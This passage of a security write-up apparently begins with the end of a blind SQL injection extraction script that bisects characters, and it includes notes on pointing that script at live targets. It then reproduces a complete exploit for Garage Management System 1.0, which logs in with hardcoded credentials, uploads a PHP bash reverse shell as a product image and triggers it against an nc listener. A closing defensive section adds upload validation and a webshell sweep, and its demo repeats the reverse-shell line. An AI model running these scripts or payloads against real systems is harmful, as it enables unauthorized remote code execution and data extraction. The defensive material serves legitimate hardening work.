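    chars = []
    for pos in range(1, length + 1):
        # Printable ASCII is 32..126; unicode() is sqlite's ascii().
        chars.append(chr(bisect_value(f"unicode(substr({expr},{pos},1))", 32, 126)))
    return "".join(chars)


def request_count():
    """Number of oracle queries issued so far."""
    return _requests["count"]


if __name__ == "__main__":
    print(extract(), "recovered in", request_count(), "requests")
```

Against the page's targets the same driver works by swapping `oracle` for a `requests.post` that compares the body to the success marker and by translating the expressions to MySQL syntax. Nine characters cost at most 70 requests here; the linear charset walk needs up to 27 per character and silently drops digits and uppercase, which is why the scripts' recovered name can be incomplete.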
<pre><code># Exploit Title: Garage Management System Remote Code Execution via File Upload<br /># Date: 24/07/2022<br /># Exploit Author: saitamang<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/garage.zip<br /># Version: 1.0<br /># Tested on: Centos 7 + MySQL<br /><br /># After logging in, createProduct.php accepts any file as the product image and<br /># stores it under assets/myimages/ with its original name, so a .php file can be<br /># uploaded and then requested to execute it. The script starts a netcat listener<br /># in a terminator window, uploads a PHP reverse shell pointed at this host's<br /># eth0 address, and requests it.<br /><br />import requests, subprocess, sys, warnings, time<br />from requests.packages.urllib3.exceptions import InsecureRequestWarning<br />warnings.simplefilter('ignore', InsecureRequestWarning)<br />from netifaces import interfaces, ifaddresses, AF_INET<br /><br />req = requests.Session()<br /><br />def login(ip, username, password):<br />    target = "http://%s/garage/garage/login.php" % ip<br />    data = {'username': username, 'password': password, 'login': ''}<br />    response = req.post(target, data=data)<br /><br />    if 'Login Successfully' in response.text:<br />        print("[$] Success Login :)")<br />        trigger_rce(ip)<br />    else:<br />        print("[$] Failed Login :(")<br /><br />def create_rs():<br />    # Write a PHP reverse shell that connects back to this host's eth0 address.<br />    for ifaceName in interfaces():<br />        if ifaceName != "eth0":<br />            continue<br />        addresses = [i['addr'] for i in ifaddresses(ifaceName).get(AF_INET, [])]<br />        if not addresses:<br />            break<br />        ipadd = addresses[0]<br />        payload = "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/" + ipadd + "/1234 0>&1'\")?>"<br />        with open("saitamang.php", "w") as f:<br />            f.write(payload)<br />        return<br />    print("[-] No IPv4 address on eth0; cannot build the reverse shell")<br />    sys.exit(-1)<br /><br />def trigger_rce(ip):<br />    create_rs()<br />    target = "http://%s/garage/garage/php_action/createProduct.php" % ip<br /><br />    # Field names as expected by createProduct.php ("currnt_date" is the<br />    # application's own spelling).<br />    multipart_form_data = {<br />        "currnt_date": (None, ""),<br />        "productImage": ("saitamang.php", open("saitamang.php", "rb")),<br />        "productName": (None, "test"),<br />        "quantity": (None, "1"),<br />        "rate": (None, "1"),<br />        "brandName": (None, "1"),<br />        "categoryName": (None, "1"),<br />        "productStatus": (None, "1"),<br />        "create": (None, "")<br />    }<br /><br />    req.post(target, files=multipart_form_data)<br /><br />    print("[$] Enjoy your RCE :)")<br />    # Requesting the uploaded file executes it; the reverse shell connects to<br />    # the listener started in main.<br />    req.get("http://%s/garage/garage/assets/myimages/saitamang.php" % ip)<br /><br /><br />if __name__ == "__main__":<br />    print(" _____ _ __ ")<br />    print(r" / ___/____ _(_) /_____ _____ ___ ____ _____ ____ _")<br />    print(r" \__ \/ __ `/ / __/ __ `/ __ `__ \/ __ `/ __ \/ __ `/")<br />    print(r" ___/ / /_/ / / /_/ /_/ / / / / / / /_/ / / / / /_/ / ")<br />    print(r"/____/\__,_/_/\__/\__,_/_/ /_/ /_/\__,_/_/ /_/\__, / ")<br />    print(" /____/ \n\n")<br /><br />    try:<br />        ip = sys.argv[1].strip()<br /><br />        # Credentials hardcoded by the author for the login step.<br />        username = "mayuri.infospace@gmail.com"<br />        password = "rootadmin"<br /><br />        # Listener for the reverse shell in its own terminal window; Popen so<br />        # the script continues while the listener waits.<br />        subprocess.Popen(['terminator', '-e', 'nc -lvp 1234'])<br />        time.sleep(2)<br />        login(ip, username, password)<br /><br />    except IndexError:<br />        print("[-] Usage %s <ip>" % sys.argv[0])<br />        print("[-] Example: %s 192.168.100.x" % sys.argv[0])<br />        sys.exit(-1)<br /></code></pre>
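The upload above succeeds because the product-image handler trusts the client's filename and content and stores the file where the web server executes PHP. The following is an added example, not the Garage Management System's code: the server-side checks that would have rejected `saitamang.php` (extension allow-list, magic-bytes check, server-chosen random filename), plus the sweep an incident responder runs over an upload directory to find files like it after the fact. The directory layout and sample files are constructed for the example.

```python
"""Added example, not the Garage Management System's code: upload
validation that stops the PoC, and a sweep that finds such files later.

Assumptions: an image-only upload field; uploads stored under a directory
the web server serves (as assets/myimages/ is above).
"""
import os
import secrets
import tempfile

# Declared extension -> magic bytes the content must start with.
ALLOWED = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "gif": b"GIF8"}
# Extensions that a server-side interpreter may execute.
SCRIPT_EXT = {".php", ".phtml", ".php3", ".php5", ".phar", ".jsp", ".asp", ".aspx", ".cgi"}


def validate_image_upload(filename, data):
    """Return a safe, server-chosen storage name or raise ValueError.

    The client's filename is only consulted for the declared extension and
    never reused on disk, so 'shell.php' and 'shell.php.png' tricks fail."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED:
        raise ValueError(f"extension .{ext} not allowed")
    if not data.startswith(ALLOWED[ext]):
        raise ValueError("content does not match declared image type")
    return f"{secrets.token_hex(16)}.{ext}"


def find_webshells(root):
    """Walk an upload directory; flag script extensions or PHP open tags."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                head = f.read(4096)
            ext = os.path.splitext(name)[1].lower()
            if ext in SCRIPT_EXT or b"<?php" in head or b"<?=" in head:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def demo():
    """Constructed inputs: the PoC's PHP reverse shell and a PNG header."""
    php = b"<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/1234 0>&1'\")?>"
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    results = {}
    for fname, blob in (("saitamang.php", php), ("logo.png", png), ("logo.php.png", php)):
        try:
            validate_image_upload(fname, blob)
            results[fname] = "accepted"
        except ValueError as e:
            results[fname] = f"rejected: {e}"
    # Simulated upload directory containing a straight .php drop and a PHP
    # file disguised with an image extension.
    with tempfile.TemporaryDirectory() as d:
        os.makedirs(os.path.join(d, "myimages"))
        for fname, blob in (("saitamang.php", php), ("logo.png", png), ("shell.png", php)):
            with open(os.path.join(d, "myimages", fname), "wb") as f:
                f.write(blob)
        results["sweep"] = find_webshells(d)
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "->", v)
```

Validation alone is not the whole fix: the upload directory should also be outside the document root or served with script execution disabled, so that a file which slips through the checks is still only ever sent as bytes. The sweep catches the disguised `shell.png` by its `<?php` tag, which matters because a PHP-by-content file is harmless until a misconfiguration or an LFI bug runs it.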